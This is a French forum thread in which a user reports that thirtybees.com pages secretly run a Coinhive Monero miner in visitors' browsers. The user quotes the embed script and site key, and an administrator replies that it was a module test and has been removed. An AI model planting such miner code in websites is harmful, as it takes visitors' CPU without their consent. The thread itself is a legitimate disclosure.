Vous minez des crypto-devises Monero en consultant le site thirtybees.com



  • J’ai constaté une activité CPU inhabituelle en consultant le site thirtybees.com, même sur les pages statiques après leur chargement complet. J’ai ciblé la cause de cette activité CPU comme provenant de la présence du JavaScript Coinhive de minage de la crypto-devise Monero.

    Chaque page du site thirtybees.com contient un bloc de code similaire à celui repris ci-dessous (vous pouvez le vérifier vous-même en demandant à votre navigateur d’afficher le code source de la page web affichée) :

    <script src="https://coin-hive.com/lib/coinhive.min.js"></script>
    
    <script>
    var miner = new CoinHive.User('exM8T2cPejRG5rBVALGIeo3K9FGdNmkR', 'forum-test', {
    	threads: 1,
    	autoThreads: false,
    	throttle: 0.5,
    	forceASMJS: false
    });
    miner.start(CoinHive.IF_EXCLUSIVE_TAB);
    
    </script>
    

    Si vous voulez savoir ce qu’est CoinHive et comment cela fonctionne : https://coin-hive.com/

    L’utilisation CPU varie de page en page sur le site thirtybees.com (en fonction du paramètre throttle, qui n’est pas identique pour toutes les pages du site web).
    Dans mon cas, les pages du forum utilisent constamment entre 12% et 15% du CPU, la page portail du site plus de 20%. Vous pouvez le vérifier vous-même : fermez tous les programmes, lancer le gestionnaire de tâches pour voir l’activité CPU en temps réel, ouvrez juste une page de thirtybees.com dans votre navigateur, profitez du spectacle !
    Votre utilisation CPU peut être différente des chiffres repris ci-dessus, mais vous constaterez de toutes façons une utilisation CPU constante et relativement stable tant que la page sera affichée.
    Si vous laissez une page affichée en permanence dans votre navigateur (le forum peut-être ?), vous taxez votre CPU toute la journée…

    Si je peux comprendre que le propriétaire d’un site web veuille rentabiliser son site d’une façon ou d’une autre, les utilisateurs devraient au moins être informés quand une solution de ce type est utilisée, et idéalement devraient pouvoir la désactiver facilement.

    Ceci n’est que ma modeste participation (en Monero)


  • administrators

    J’ai abordé les préoccupations ici, je faisais un test pour un nouveau module ce matin. Le code a été supprimé. https://forum.thirtybees.com/topic/868/you-are-mining-monero-crypto-currency-when-using-thirtybees-com-website/



  • @lesley Je suis heureux de constater que tout ceci a été implémenté de façon temporaire et “avec les meilleures intentions”. Ceci dit un petit message sur le forum avant de commencer l’expérimentation aurait été plus que suffisant pour éviter toute interrogation.


Log in to reply
 

Looks like your connection to thirty bees forum was lost, please wait while we try to reconnect.